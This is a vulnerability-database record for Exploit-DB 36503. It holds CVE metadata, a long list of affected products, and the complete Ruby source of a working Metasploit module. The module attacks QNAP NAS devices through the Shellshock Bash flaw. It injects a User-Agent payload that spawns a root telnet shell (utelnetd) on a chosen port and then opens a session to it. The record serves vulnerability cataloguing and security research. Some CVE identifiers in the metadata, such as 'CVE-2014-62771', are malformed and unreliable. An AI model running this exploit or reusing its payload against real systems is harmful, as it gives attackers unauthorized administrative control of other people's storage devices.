ID
VAR-E-201410-0028
CVE
| cve_id: | CVE-2014-7910 | Trust: 1.0 |
| cve_id: | CVE-2014-7227 | Trust: 1.0 |
| cve_id: | CVE-2014-7196 | Trust: 1.0 |
| cve_id: | CVE-2014-7169 | Trust: 1.0 |
| cve_id: | CVE-2014-62771 | Trust: 1.0 |
| cve_id: | CVE-2014-6271 | Trust: 1.0 |
| cve_id: | CVE-2014-3671 | Trust: 1.0 |
| cve_id: | CVE-2014-3659 | Trust: 1.0 |
| cve_id: | CVE-2014-6277 | Trust: 0.3 |
EDB ID
36503
TITLE
QNAP - Admin Shell via Bash Environment Variable Code Injection (Metasploit) - Hardware remote Exploit
Trust: 1.0
DESCRIPTION
QNAP - Admin Shell via Bash Environment Variable Code Injection (Metasploit). CVE-2014-7910CVE-112004CVE-2014-7227CVE-2014-7196CVE-2014-7169CVE-2014-62771CVE-2014-6271CVE-2014-3671CVE-2014-3659 . remote exploit for Hardware platform
Trust: 1.0
AFFECTED PRODUCTS
| vendor: | qnap | model: | - | scope: | - | version: | - | Trust: 1.0 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5 | Trust: 0.6 |
| vendor: | xerox | model: | workcentre | scope: | eq | version: | 7245 | Trust: 0.3 |
| vendor: | xerox | model: | workcentre | scope: | eq | version: | 7242 | Trust: 0.3 |
| vendor: | xerox | model: | workcentre | scope: | eq | version: | 7238 | Trust: 0.3 |
| vendor: | xerox | model: | workcentre | scope: | eq | version: | 7235 | Trust: 0.3 |
| vendor: | xerox | model: | workcentre | scope: | eq | version: | 7232 | Trust: 0.3 |
| vendor: | xerox | model: | workcentre | scope: | eq | version: | 7228 | Trust: 0.3 |
| vendor: | xerox | model: | phaser | scope: | eq | version: | 78000 | Trust: 0.3 |
| vendor: | xerox | model: | phaser | scope: | eq | version: | 67000 | Trust: 0.3 |
| vendor: | xerox | model: | colorqube | scope: | eq | version: | 9393 | Trust: 0.3 |
| vendor: | xerox | model: | colorqube | scope: | eq | version: | 9303 | Trust: 0.3 |
| vendor: | xerox | model: | colorqube | scope: | eq | version: | 9302 | Trust: 0.3 |
| vendor: | xerox | model: | colorqube | scope: | eq | version: | 9301 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux lts i386 | scope: | eq | version: | 12.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux lts amd64 | scope: | eq | version: | 12.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux sparc | scope: | eq | version: | 10.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux powerpc | scope: | eq | version: | 10.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux i386 | scope: | eq | version: | 10.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux arm | scope: | eq | version: | 10.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux amd64 | scope: | eq | version: | 10.04 | Trust: 0.3 |
| vendor: | sun | model: | solaris | scope: | eq | version: | 11 | Trust: 0.3 |
| vendor: | redhat | model: | enterprise linux | scope: | eq | version: | 5.0 | Trust: 0.3 |
| vendor: | redhat | model: | enterprise linux client | scope: | eq | version: | 5 | Trust: 0.3 |
| vendor: | red | model: | hat enterprise linux workstation | scope: | eq | version: | 6 | Trust: 0.3 |
| vendor: | red | model: | hat enterprise linux server | scope: | eq | version: | 6 | Trust: 0.3 |
| vendor: | red | model: | hat enterprise linux long life server | scope: | eq | version: | 5.6 | Trust: 0.3 |
| vendor: | red | model: | hat enterprise linux hpc node | scope: | eq | version: | 6 | Trust: 0.3 |
| vendor: | red | model: | hat enterprise linux server | scope: | eq | version: | 5 | Trust: 0.3 |
| vendor: | oracle | model: | vm virtualbox | scope: | eq | version: | 3.2 | Trust: 0.3 |
| vendor: | oracle | model: | vm virtualbox | scope: | eq | version: | 3.1 | Trust: 0.3 |
| vendor: | oracle | model: | linux | scope: | eq | version: | 5 | Trust: 0.3 |
| vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 6.2 | Trust: 0.3 |
| vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 6 | Trust: 0.3 |
| vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 5 | Trust: 0.3 |
| vendor: | mcafee | model: | email gateway patch | scope: | eq | version: | 7.01 | Trust: 0.3 |
| vendor: | mcafee | model: | email gateway | scope: | eq | version: | 7.0 | Trust: 0.3 |
| vendor: | mcafee | model: | email gateway hotfix | scope: | eq | version: | 6.7.22 | Trust: 0.3 |
| vendor: | mcafee | model: | email gateway hotfix | scope: | eq | version: | 6.7.21 | Trust: 0.3 |
| vendor: | ibm | model: | ds8000 | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | ibm | model: | aix | scope: | eq | version: | 7.1 | Trust: 0.3 |
| vendor: | ibm | model: | aix | scope: | eq | version: | 6.1 | Trust: 0.3 |
| vendor: | ibm | model: | aix | scope: | eq | version: | 5.3 | Trust: 0.3 |
| vendor: | hp | model: | insight control | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 3.1.4 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 3.0.16 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 4.2 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 4.1 | Trust: 0.3 |
| vendor: | gnu | model: | bash rc1 | scope: | eq | version: | 4.0 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 4.0 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 3.2.48 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 3.2 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 3.00.0(2) | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 3.0 | Trust: 0.3 |
| vendor: | gentoo | model: | linux | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cosmicperl | model: | directory pro | scope: | eq | version: | 10.0.3 | Trust: 0.3 |
| vendor: | cisco | model: | wide area application services | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | unified ip phone | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | unified contact center express | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | network analysis module | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | mds | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | gss 4492r global site selector | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | emergency responder | scope: | eq | version: | 1.1 | Trust: 0.3 |
| vendor: | cisco | model: | digital media manager | scope: | eq | version: | 5.0 | Trust: 0.3 |
| vendor: | cisco | model: | digital media manager | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | show and share | scope: | eq | version: | 5(2) | Trust: 0.3 |
| vendor: | avaya | model: | ip deskphone | scope: | eq | version: | 96x16.2 | Trust: 0.3 |
| vendor: | avaya | model: | ip deskphone | scope: | eq | version: | 96x16 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.8 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.7 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.6 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.5 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.11 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.10 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.9 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.8 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.7 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.6 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.5 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.9 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.8 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.7 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.6 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.5 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.8 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.7 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.6 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.5 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.1.5 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.1.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.1.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.1.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.1.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.0.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.0.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.0.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.03 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.0 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6 | Trust: 0.3 |
EXPLOIT
# Exploit Title: QNAP admin shell via Bash Environment Variable Code Injection
# Date: 7 February 2015
# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
# Employer homepage: http://www.securegroup.it
# Vendor homepage: http://www.qnap.com
# Version: All Turbo NAS models except TS-100, TS-101, TS-200
# Tested on: TS-1279U-RP
# CVE : 2014-6271
# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/d3vpp/metasploit-modules
##
require 'msf/core'
require 'net/telnet'
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::CommandShell
def initialize(info = {})
super(update_info(info,
'Name' => 'QNAP admin shell via Bash Environment Variable Code Injection',
'Description' => %q{
This module allows you to spawn a remote admin shell (utelnetd) on a QNAP device via Bash Environment Variable Code Injection.
Affected products:
All Turbo NAS models except TS-100, TS-101, TS-200
},
'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
'License' => MSF_LICENSE,
'References' => [
['CVE', '2014-6271'], #aka ShellShock
['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']
],
'Platform' => ['unix']
))
register_options([
OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),
OptPort.new('LTELNET', [true, 'Set the remote port where the utelnetd service will be listening','9993'])
], self.class)
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'agent' => "() { :;}; echo; /usr/bin/id"
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
vprint_error("Connection failed")
return Exploit::CheckCode::Unknown
end
if !res
return Exploit::CheckCode::Unknown
elsif res.code== 302 and res.body.include? 'uid'
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit_telnet()
telnetport = datastore['LTELNET']
print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")
print_status("#{rhost}:#{rport} - Sending exploit")
begin
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
if sock
print_good("#{rhost}:#{rport} - Backdoor service spawned")
add_socket(sock)
else
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not spawned")
end
print_status "Starting a Telnet session #{rhost}:#{telnetport}"
merge_me = {
'USERPASS_FILE' => nil,
'USER_FILE' => nil,
'PASS_FILE' => nil,
'USERNAME' => nil,
'PASSWORD' => nil
}
start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
rescue
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not handled")
end
return
end
def run
begin
telnetport = datastore['LTELNET']
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'agent' => "() { :;}; /bin/utelnetd -l/bin/sh -p#{telnetport} &"
})
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
Rex::HostUnreachable => e
fail_with(Failure::Unreachable, e)
ensure
disconnect
end
exploit_telnet()
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 1.0
PRICE
free
Trust: 1.0
TYPE
Admin Shell via Bash Environment Variable Code Injection (Metasploit)
Trust: 1.0
TAGS
| tag: | Metasploit Framework (MSF) | Trust: 1.0 |
CREDITS
Patrick Pellegrino
Trust: 1.0
EXTERNAL IDS
| db: | NVD | id: | CVE-2014-3671 | Trust: 1.0 |
| db: | NVD | id: | CVE-2014-7196 | Trust: 1.0 |
| db: | NVD | id: | CVE-2014-7227 | Trust: 1.0 |
| db: | NVD | id: | CVE-2014-7910 | Trust: 1.0 |
| db: | NVD | id: | CVE-2014-7169 | Trust: 1.0 |
| db: | NVD | id: | CVE-2014-62771 | Trust: 1.0 |
| db: | NVD | id: | CVE-2014-6271 | Trust: 1.0 |
| db: | NVD | id: | CVE-2014-3659 | Trust: 1.0 |
| db: | EXPLOIT-DB | id: | 36503 | Trust: 1.0 |
| db: | NVD | id: | CVE-2014-6277 | Trust: 0.3 |
| db: | BID | id: | 70165 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-7910 | Trust: 1.0 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-7169 | Trust: 1.0 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-6271 | Trust: 1.0 |
| url: | https://github.com/d3vpp/metasploit-modules | Trust: 1.0 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-62771 | Trust: 1.0 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-7196 | Trust: 1.0 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-3659 | Trust: 1.0 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-7227 | Trust: 1.0 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-3671 | Trust: 1.0 |
| url: | http://www.gnu.org/software/bash/ | Trust: 0.3 |
SOURCES
| db: | BID | id: | 70165 |
| db: | EXPLOIT-DB | id: | 36503 |
LAST UPDATE DATE
2023-05-30T10:41:06.196000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 70165 | date: | 2015-10-26T16:51:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 70165 | date: | 2014-09-27T00:00:00 |
| db: | EXPLOIT-DB | id: | 36503 | date: | 2015-03-26T00:00:00 |